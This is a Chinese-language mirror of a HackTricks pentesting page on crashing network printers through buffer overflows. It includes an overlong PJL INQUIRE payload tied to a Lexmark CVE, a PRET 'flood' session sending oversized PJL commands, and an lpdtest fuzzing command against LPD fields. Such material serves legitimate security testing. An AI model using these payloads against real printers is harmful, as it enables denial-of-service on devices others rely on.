Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 13:13:41 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/pentesting-printers/buffer-overflows.md
Translator workflow a21a0e7217 Translated to Chinese
2023-08-03 19:12:22 +00:00

5.2 KiB
Raw Blame History

☁️ HackTricks云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

PJL

当将大约1,000个字符作为INQUIRE参数发送给_Lexmark_激光打印机时会导致其崩溃参见CVE-2010-0619。将大约3,000个字符作为SET参数发送给_Dell 1720n_会导致设备崩溃

@PJL INQUIRE 00000000000000000000000000000000000000000000000000000…

您可以使用PRET来检查缓冲区溢出:

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> flood
Buffer size: 10000, Sending: @PJL SET [buffer]
Buffer size: 10000, Sending: @PJL [buffer]
Buffer size: 10000, Sending: @PJL COMMENT [buffer]
Buffer size: 10000, Sending: @PJL ENTER LANGUAGE=[buffer]
Buffer size: 10000, Sending: @PJL JOB NAME="[buffer]"
Buffer size: 10000, Sending: @PJL EOJ NAME="[buffer]"
Buffer size: 10000, Sending: @PJL INFO [buffer]
Buffer size: 10000, Sending: @PJL ECHO [buffer]
Buffer size: 10000, Sending: @PJL INQUIRE [buffer]
Buffer size: 10000, Sending: @PJL DINQUIRE [buffer]
Buffer size: 10000, Sending: @PJL USTATUS [buffer]
Buffer size: 10000, Sending: @PJL RDYMSG DISPLAY="[buffer]"
Buffer size: 10000, Sending: @PJL FSQUERY NAME="[buffer]"
Buffer size: 10000, Sending: @PJL FSDIRLIST NAME="[buffer]"
Buffer size: 10000, Sending: @PJL FSINIT VOLUME="[buffer]"
Buffer size: 10000, Sending: @PJL FSMKDIR NAME="[buffer]"
Buffer size: 10000, Sending: @PJL FSUPLOAD NAME="[buffer]"

LPD守护进程

它允许多个用户定义的向量如_jobnameusername或hostname_这些向量可能**没有足够的保护。已经发现了与此故障相关的几个漏洞。

可以使用PETT中包含的lpdtest工具创建一个简单的LPD模糊器,用于测试缓冲区溢出。in参数将LPD协议定义的所有用户输入设置为某个值在本例中为Python输出

./lpdtest.py printer in "`python -c 'print "x"*150'`"

你可以在 http://hacking-printers.net/wiki/index.php/Buffer_overflows 找到更多关于这些攻击的信息

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥